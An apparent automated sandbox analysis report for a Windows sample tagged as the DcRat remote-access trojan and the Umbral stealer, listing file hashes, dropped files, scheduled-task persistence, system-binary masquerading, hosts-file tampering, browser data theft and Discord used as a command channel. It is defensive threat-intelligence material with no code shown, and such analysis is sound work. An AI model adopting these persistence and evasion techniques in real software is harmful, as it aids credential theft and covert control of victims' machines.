SHA256 eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b
SHA512 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

memory/2508-14-0x00000000013E0000-0x0000000001420000-memory.dmp

\Users\Admin\AppData\Local\Temp\Inject.exe

MD5 d428ddd1b0ce85a6c96765aeaf246320
SHA1 d100efdaab5b2ad851fe75a28d0aa95deb920926
SHA256 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb
SHA512 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

memory/2892-20-0x0000000004980000-0x00000000049AA000-memory.dmp

memory/2964-25-0x000000013F9D0000-0x000000013F9FA000-memory.dmp

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

MD5 7c9bb5fda146efee5ee4a243d6e404b0
SHA1 c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA256 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

MD5 ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1 252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA256 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA512 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

C:\MsWinsessiondllNet\driverBrokercommon.exe

MD5 d84e590c3715c79dc5b92c435957d162
SHA1 2901580903e4b356448d9fe7bea510261e655363
SHA256 d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512 b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

memory/1652-37-0x00000000010E0000-0x000000000132A000-memory.dmp

memory/1652-38-0x0000000000140000-0x0000000000148000-memory.dmp

memory/1652-39-0x0000000000150000-0x0000000000158000-memory.dmp

memory/1652-40-0x0000000000190000-0x00000000001A0000-memory.dmp

memory/1652-41-0x00000000003F0000-0x0000000000446000-memory.dmp

memory/1652-42-0x0000000000170000-0x000000000017C000-memory.dmp

memory/1652-44-0x0000000000630000-0x000000000063C000-memory.dmp

memory/1652-43-0x00000000001A0000-0x00000000001AC000-memory.dmp

memory/1652-45-0x0000000000640000-0x0000000000648000-memory.dmp

memory/1652-46-0x0000000000650000-0x000000000065A000-memory.dmp

memory/1652-47-0x0000000000B00000-0x0000000000B0E000-memory.dmp

memory/1652-48-0x0000000000B10000-0x0000000000B18000-memory.dmp

memory/1652-49-0x0000000000B20000-0x0000000000B2A000-memory.dmp

memory/1652-50-0x0000000000BB0000-0x0000000000BBC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat

MD5 f7d10cf8a502ea71bc4cf2823a716694
SHA1 1a03facad61a8d1b448da90c60aa10b2ec73125a
SHA256 e2aa65fb4d4586edde781afee4a2c45456983110fecf37800b48ca47921a6c71
SHA512 53df9b650686d54d3e80c1a416b98e9353a89a09d3e4884212ab42a2dced1f0b400f76afc298d1d868c5504736de7ab4694a408c12358d295242937a4547d09c

memory/2460-62-0x0000000001160000-0x00000000013AA000-memory.dmp

memory/2460-63-0x000000001A8C0000-0x000000001A916000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs

MD5 54a4ab02c1f992df21647e3a4b609dc5
SHA1 933dfdeb84d9634a6c29605a5b445b9769ad7beb
SHA256 45919df7cf84c7ef28302c045d59dc8ca5f77e79d70d1b1f85d1e524b70f5a1a
SHA512 fc32ad4184906f96c4562c1544644c7c17901ce058030a6894d15639d93b73b9cf7d2a94acb0641a0c06089ceb990543cb359de3e3b420ee6622725542946b9f

C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs

MD5 8abcd2ae172afeb4ff08339b8fcffc25
SHA1 c19f781edabe30c1d1fbf2bb7cc970456eacd060
SHA256 1e5334f0d108336af7b8d597f3937ceb35a057922ace5b3e61e45a6cf48e0a6b
SHA512 2876bb2c9f8ac0aeb72f0bba3f907ed3dba9e5322cd28d8875d55a6a784e80d4bc032582b5977811bd6db659887e8397cca7f1aef603ec8b974936196313605f

C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs

MD5 033de561bdc7c0ca00ad0401bb082688
SHA1 2e8f6980e6b56f46c045a55803efb854595df75c
SHA256 3dc818abd994a8ef72851ff07a297b8cd5cfdb9b5fefd67328a8927985b7da5a
SHA512 61c4b381627f40b831a08cbf5b57245c720791bf693b378ca929731522847d68d6455047735fce7a590b769dcd1414dc2169e9ac1214a3dd4a778a580d2dba8c

C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs

MD5 9ae89897944358d29f5cffdc7ae53012
SHA1 ac33a9b6cf573f9af6b47b488a7aef5f5a6a90d7
SHA256 f90b4075a640a9f6e66fd66a99e12cc0b28d5a3dd7481a94538e4adfb52fed57
SHA512 a062d88a1cc77a451e251a8225c2d5fb3985a14390eeb1cbfd927c4eabc69c259cd267b58c70fd6462f6269f05fce35c992e5d439c2c49fc688fb6b16954befe

C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs

MD5 e6be198e9b7e5ce620d555dd8c3ffcf0
SHA1 4a172a1ae35f9a8cd67943c9981612467d3d45c8
SHA256 7c097f6b2f439250559ea809c39f4bdff6acb0ee7a172aaa26d2d7a6aa5245ae
SHA512 fb542d4cc53e0468211623a8b37930f9b889fec67458cf17c3e67282f2814de916705996d2663fa3e2ce1f51269e413771ceeb524f644eda09c0f6d4747cdea6

C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs

MD5 6febe70bd4b9501ff665cbdc618847c5
SHA1 8840b48e3ef3baea97cf136db5020255a96e71fa
SHA256 65970a84b910cd3e31c2bd70c919c6c82bd47b6b0e590df373ca10a0f2fe8f72
SHA512 1da13ac7bee6e3dbef7d9088449033483b17c0b2765be7c33defc945185c4ff402febe3d7498c2aef859ac01dd2b136e1e7531632bf0c6ebf93db01fd48342fa

C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs

MD5 d6c220096df3c66a29f927f521da8e5f
SHA1 572d59a219f371433f29b5a1d10f45193cffba20
SHA256 e17e34086e8e29048ccadf5e5ea9bf57643d6f834b380086e623c92dd23af439
SHA512 8351d2c62e13732494b9979bd7a563cf88e1c7ccc0896adaef32ee5fff4ae758c998aaf413292124a8d46f5bdfaa9c7e519de03093091107c0683b93510ddbc2

memory/2336-129-0x0000000000610000-0x0000000000666000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs

MD5 11cbace0608b5facaec85f9ab63a2743
SHA1 071f69516a7bb9d86edeae73d13b72a3ced7abdd
SHA256 a038ca5a1d89a8b89fbdce7c537dde8c878644cb4a509bac4e7386945c4bb713
SHA512 dc18040ec489320b1e060ad2ae8ca3d148812e88e99a38967b49b23e57d91c0e42d1943c5bbce6800dbb7ad10e042dd0a9bb64772fd9ed8d18e8399b632e6021

memory/1696-141-0x00000000000C0000-0x000000000030A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs

MD5 5ee3bd681f680cdc5518b286570b28c2
SHA1 d86da3820b4d08031f5f263e727eb12c0881bea1
SHA256 3ab21a3c8c8b8584c7d35ab76d6556fe281666bee0880baef4490a719a56b989
SHA512 77585d574d8dcc0fa257c5cd11b38b0f616e74726cc4a3fd6f11d99e19ce9f3e38f6521ef43ea61d3ea59223101c2f067853a046c4edda3f9dfcf2113d557e96

memory/1436-153-0x00000000011F0000-0x000000000143A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs

MD5 4b6b46eab9c52b28d9814e7abd31baaf
SHA1 bafcefe324854d398d6f8bb506d593f59a72c3bf
SHA256 58c2bb82bf82371de06c2d3a7cad22c24e5f9e4bd94f4bf415436d5b1cc2f395
SHA512 24b6981da8cde1d9be8ddad6e5feb7c9e2a4f1b90cf2c84f5f7f4393cefcfe70a70801e16ed5aa26b008907608280297aeb565c993e7590d2149c93dbe693692

C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs

MD5 dcee4dce741bd20ca0db644c2c5e46e7
SHA1 11db5b4398b3f46aee65d3381bde7ba7143c22d6
SHA256 6d725edfb7ccbf27477df652f4334171a691e9c731681c805a7d84ebd9269177
SHA512 24efe9c8faea46acf6d3f5692ad6fb1292fd065e87196ca7cf4b46eec1ce17619936cb81a053b289ca7451e32b83f139dd12554497ef8374628fdc563907553d

C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs

MD5 ee5ef58333c9ac975005e403469f5ad9
SHA1 9ce58c735d017f14510772fb4d44528177509c59
SHA256 7d83e686176e73272f93deb3a961be58d15414f0b24fff41b12a83a2771635b6
SHA512 94d418bac88c3e2a15a12a3157fdf5a43b434302a958813af47ffff74dcfdec8695e8566d07292246b43d3a47f2233c6e31deb2345be736a99f906a0ebd9e2b1

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-05 01:28

Reported

2024-05-05 01:30

Platform

win10v2004-20240419-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Users\All Users\OfficeClickToRun.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Internet Explorer\en-US\f3b6ecef712a24 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Common Files\6cb0b6c459d5d3 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\69ddcba757bf72 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\backgroundTaskHost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\eddb19405b7ce1 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\6cb0b6c459d5d3 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Internet Explorer\en-US\spoolsv.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\56085415360792 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Common Files\dwm.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Speech_OneCore\Engines\e6c9b481da804f C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\Migration\WTR\SppExtComObj.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\Migration\WTR\e1ef82546f0b02 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\INF\winlogon.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\INF\cc11b995f2a76d C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
